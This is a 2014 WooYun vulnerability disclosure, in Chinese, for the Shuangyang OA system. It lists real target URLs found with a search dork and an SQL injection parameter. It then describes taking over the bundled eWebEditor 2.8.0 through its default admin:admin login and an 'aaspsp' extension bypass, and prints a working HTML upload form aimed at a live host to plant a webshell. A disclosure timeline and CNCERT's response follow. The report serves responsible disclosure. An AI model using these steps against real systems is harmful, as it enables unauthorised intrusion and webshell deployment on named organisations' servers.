[公开漏洞]双杨OA又一处SQL注入+限制关键词+官网再次中招+证明其通用性

来源:WooYun 浏览:1019次 时间:2014-07-10
做网站找雨过天晴工作室
双杨OA又一处SQL注入+限制关键词+官网再次中招+证明其通用性 相关厂商: 上海双杨电脑高科技开发公司 漏洞作者:夕风号 提交时间:2014-04-10 18:00 公开时间:2014-07-09 18:01 漏洞类型:SQL注射漏洞 危害等级:高 自评Rank:10 漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理 漏洞来源:http://www.wooyun.org Tags标签: SQL注射 漏洞详情 披露状态:

2014-04-10:细节已通知厂商并且等待厂商处理中
2014-04-15:厂商已经确认,细节仅向厂商公开
2014-04-18:细节向第三方安全合作伙伴开放
2014-04-25:细节向核心白帽子及相关领域专家公开
2014-05-05:细节向普通白帽子公开
2014-05-25:细节向实习白帽子公开
2014-07-09:细节向公众公开

简要描述:

cncert说,仍未找到实进行进行通用性核实,然后,就有了此洞。

详细说明:

1.先证明其通用性

搜索引擎搜索“首次使用请先点击安装”即可找到部分案例,

举例:

http://oa.syc.com.cn/OA/index/index.aspx

http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx

http://221.199.203.230:9001/dsoa/index/index.aspx

http://180.166.56.106/dsoa/index/index0.aspx

http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx



2.SQL注入

上次的注射点在/help/HelpShowTip.aspx?helpid=1

这次又发现注射点help/HelpShow.aspx?id=1

比如,http://oa.syc.com.cn/OA/help/HelpShow.aspx?id=1

证明图略。



3.限制关键词

该OA使用eWebEditor 2.8.0

比如,访问http://oa.syc.com.cn/OA/ewebeditor/admin_login.asp,以默认admin:admin登陆,修改样式,记下样式名称,比如“s_exampleremote”,在“其它类型”中添加“aaspsp”,

1.png



提交,

再使用如下exp:

<HTML>
<HEAD>
<meta charset="utf-8" />
<TITLE>限制关键词</TITLE>
</head>
<body>
<form action="http://oa.syc.com.cn/OA/ewebeditor/upload.asp?action=save&type=FILE&style=s_exampleremote" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%" onchange="originalfile.value=this.value">
<input type=hidden name=originalfile value="">
<input type=submit value="提交">
</form>
</body>
</html>



随后于“上传文件管理”中找到刚才上传的webshell,

Game Over



4.

-Why not dig a little deeper?

-Nah,no need for that.

漏洞证明:

You just saw that, didn't you, cncert?

修复方案:

Fix it right away.

C'mon, man, you guys gave me just 11rank for WooYun-2014-55573?

版权声明:转载请注明来源 夕风号@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2014-04-15 12:43

厂商回复:

最新状态:

2014-04-16:反馈一下处置情况,已经由CNVD通过公开联系渠道向软件生产厂商通报,联系双杨公司xuzk@syc.com.cn。同时根据测试案例,将所述案例下发给山东、内蒙古分中心。